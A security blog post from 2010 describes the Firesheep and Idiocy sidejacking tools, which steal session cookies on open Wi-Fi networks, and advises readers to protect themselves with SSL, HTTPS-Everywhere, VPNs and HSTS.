At least two tools have been released in the past week that make stealing Facebook, Twitter, or just about any other Web 2.0 account while you surf from your local coffee shop a drag-and-drop proposition. From a technical standpoint, it has never been difficult to do. With these new tools, however, it becomes trivial. I’im talking about something my grandmother can use.
Idiocy bills itself as a warning shot to people browsing the Internet unsecurely. The premise is simple—it is a 130-line Python script that will sniff open wireless networks for Twitter login cookies and will use that information to hijack any session it finds and to send a single Tweet. The message is simple—I browsed Twitter unsecurely on a public network and all I got was this lousy tweet. http://jonty.co.uk/idiocy-what.
The other tool, Firesheep (detected as HKTL_FYRSNIFF), is a more sophisticated tool. It is a Firefox plug-in that is capable of collecting session cookies from a much larger set of sites and that gives you the ability to fully hijack the session into your own browser. The list of sites that it can attack is even extensible by the user.
The name Firesheep is probably an homage to the Wall-of-sheep or Wall-of-shame that operate in much the same way, seen at many security and networking conferences. Showing passwords collected from open networks on a big screen during a conference is a great way to promote a sense of urgency to correct the systemic weaknesses that make such tool use possible. However, before one actually tries to use tools like these, you should be sure that doing so is actually legal.
The sidejacking attack used by these tools is rather simple. Once you enter your user name and password to log in to a website, you will get a cookie back. Usually, it is a random token that only a successfully logged-in user and the site will have matching copies of.
These tools simply monitor the network and capture this token either as the site sends it to you after logging in or as you use it to request to see the next page. With this token, it becomes trivial to impersonate your browser and to own your session. As scary as that is, some sites still send the user name and password in the clear, without any encryption, as well.
There are a few simple things you can do to protect yourself from this kind of threat.
First and foremost, use Secure Sockets Layer (SSL) whenever possible. Many popular sites offer some level of SSL access. Unfortunately, it is not always made clear that it is available and not all components are fully supported in SSL (e.g., Facebook chat). Some sites such as LinkedIn let you connect to the SSL service and silently redirect you to the normal HTTP.
If you are willing to experiment with your browser, there are a number of sites that can be used in full SSL protection mode. The EFF has a project called HTTPS-Everywhere, a Firefox plug-in capable of making the following popular services SSL protected:
- Google Search
- Most of Amazon
- WordPress.com blogs
- The New York Times
- The Washington Post
So be on the lookout for sites that use SSL for all their communication. It is also important to confirm that mobile apps and domain-specific browsers actually use SSL to connect to any back-end server. The EFF also has an ongoing campaign designed to harass Facebook into making SSL its default encryption method for all activities.
In the past, SSL presented site administrators a choice between security and performance. Modern hardware makes this a non-issue from the end user’s perspective.
As for the service provider side, Google claims to have no need for additional hardware to perform a system-wide update. Even if it does require additional equipment and effort, the added security and the reduction in hijacked accounts should more than make up for these.
Be conscious of where you log in to unsecure sites. If you are connected to the Internet over an unsecure wireless connection—say a coffee shop or an airport—everything you send to unsecure sites can be seen by any other wireless-capable device in the room.
Another option is to use a VPN. Some home routers or wireless systems now offer this as a feature. You establish a secure channel from your machine to a trusted server. Everything you do will be channeled over the secure connection to your home or office. This prevents anyone near you from collecting your credentials. This option does require some additional setup and may have some impact on network performance.
Something new to be on the lookout for is HTTP Strict Transport Security (HSTS). Currently in draft stage, though some browsers have already implemented it, HSTS allows servers to announce to clients that they should only be accessed via a secure channel. This gives site owners the ability to tell your browser, no matter what I or anyone else tells you, to use the secure site for future communication with me.
Update as of November 1, 2010, 3:39 PM (UTC-7)
Clarification has been made with regard to using SSL in popular websites.